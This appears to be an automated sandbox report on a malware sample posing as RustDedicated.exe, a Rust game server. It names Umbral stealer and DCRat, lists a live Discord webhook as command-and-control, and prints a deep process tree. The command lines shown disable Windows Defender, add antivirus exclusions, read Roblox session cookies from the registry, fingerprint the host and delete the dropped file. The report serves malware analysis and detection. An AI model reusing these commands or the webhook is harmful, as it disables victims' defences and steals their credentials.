Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
02-01-2025 18:44
General
-
Target
RustDedicated.exe
-
Size
1.2MB
-
MD5
80802d3e9eb3978b02891a1846900e64
-
SHA1
c44fe9d1f8c5f6deabfdcfc1ab9e9d4cff4e5cd8
-
SHA256
1aed0b69955713ca30ddcbd0b36ea83aebc10494fc6eafd64175c1a43d1c64c6
-
SHA512
0fabd76a7f746dde9a9326e1a486a7b6f61f542f0f88a20c0092cc6d8385d6f4e768db2ba78317340c70094a5a6c8b319958b5f08efec91c2d258d23bd1026a2
-
SSDEEP
12288:sJ+ii04vDu/1Hp8CoFxH1sB5jVC6+0AsMLkL57dROq3r3hAj7haqgQY+9LGtYSQe:jin0ulOCoFkA6+0vpwAQhBwYSBYFBav
Score
10/10
Malware Config
Extracted
Family
umbral
C2
https://discord.com/api/webhooks/1321941323787534336/9QZ7ndEN5UASj0mWrWCAOScXmVSBbRHDBhUMzvq-egRazh0wo4nXipep05-RC_cgd1Lb
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Detect Umbral payload 7 IoCs
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass 3 TTPs 3 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Umbral family
-
DCRat payload 4 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs
Using powershell.exe command.
-
Drops file in Drivers directory 6 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 12 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 6 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 7 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"13⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"14⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"15⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"16⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"19⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"21⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"23⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"25⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"27⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"29⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"31⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"33⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"36⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"37⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"65⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"67⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"68⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"69⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"70⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"71⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"72⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"72⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"71⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"72⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"72⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"70⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"71⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"71⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"72⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"73⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"69⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"70⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid71⤵
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"71⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'71⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 271⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"70⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"71⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"72⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"68⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"69⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"69⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"70⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"71⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "72⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"73⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"67⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"68⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"68⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"69⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"70⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "71⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"72⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"67⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"67⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"68⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"69⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "70⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"71⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"65⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"66⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid67⤵
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"67⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'67⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 267⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY67⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY67⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption67⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory67⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid67⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER67⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name67⤵
- Detects videocard installed
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause67⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost68⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"67⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"68⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "69⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"70⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"65⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"65⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"66⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"67⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "68⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"69⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"64⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"65⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"66⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "67⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"68⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"63⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"64⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"65⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "66⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"67⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"62⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid63⤵
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"63⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 263⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY63⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption63⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory63⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid63⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name63⤵
- Detects videocard installed
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause63⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost64⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"63⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"64⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "65⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"66⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"61⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"62⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"63⤵
-
